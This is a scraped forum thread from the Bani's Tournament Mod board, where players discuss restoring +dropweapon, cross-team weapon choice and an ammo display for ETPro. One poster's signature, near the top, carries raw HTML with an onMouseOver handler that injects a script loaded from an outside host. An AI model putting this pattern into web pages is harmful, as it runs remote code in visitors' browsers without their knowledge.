Pls show me ammo

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Rain

Post by Rain »

ogrec wrote:@ bani - seems like the poll is pretty even so just add +dropweapon in next etpro beta and if any1 whines about it you can remove it again in official etpro? How 'bout that?
People will always whine. It's what they do.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
EagleReloaded

Post by EagleReloaded »

Being able to select your SMG/Pistol/Rifle regardless of team would actually be cool imo, considering how many people have unconcious beliefs that they're different. Might make attacking easier on low/locked XP configs as the attacking team could match their guns to those of the defenders and score ammo more readily.
Some people play tennis, I erode the human soul.
ogrec

Post by ogrec »

And some ppl prefer mp over thompson or garand over k43, i just love to pick up mp40 when playing as allied, love mp40&colt :D
The Necromancer

Post by The Necromancer »

drop weapon for dropping pistol to give someone else another gun so he will have akimbo :lol:
I read that topic with vote and i was just amazed how can people whine :)
dropweapon will sadly never return to ET so you will never be able to give your teammate your guns..
BTW how about storing ps->ammo for dropped weapons as well ?
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
RaistlinRTCW

Post by RaistlinRTCW »

That ws always typically a feture of shrub in wolf, and I believe the same on ET, but was always limited in the usefullness, the only real usefull use for dropping a weapon was for heavy weapon users to swith to pistol quickly so they could run rather than waddle :-)
ogrec

Post by ogrec »

RaistlinRTCW wrote:That ws always typically a feture of shrub in wolf, and I believe the same on ET, but was always limited in the usefullness, the only real usefull use for dropping a weapon was for heavy weapon users to swith to pistol quickly so they could run rather than waddle :-)
No, it's usefull if your any class and have like 2-3 bullets in your mp left, you just drop weapon and run over fallen enemy's thompson and you pick it up. Some times you dont pick that thompson with +use from the first try so you have to try again. This way you drup your dun and you pick up other gun instantly. Very usefull, and if you think dropweapon helps soldier - not true, you dont switch weapons with dropweapon any faster, just a stupid mith.
Last edited by ogrec on Sat Oct 15, 2005 4:50 am, edited 1 time in total.
gotenks

Post by gotenks »

banimod had giveammo, maybe we could do something like that????? give your teammates the extra clips of your active weapon, or only smg/rifle/hw
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
ogrec

Post by ogrec »

http://www.xfire.be/index.php?x=poll&mode=item&id=211

Read comments, scroll down a bit. I think ppl would welcome possibility to chose weapon very well.

Btw is there gonna be that ammo show? In % i mean, it won't hurt cvops in any way if you show it in %.
bani say something pls :shock:
hiro

Post by hiro »

yay for more visual clutter on screen!

if it's added please make it turn-offable
Deus

Post by Deus »

nearly everything that has been added has been "turn off-able" as you call it :)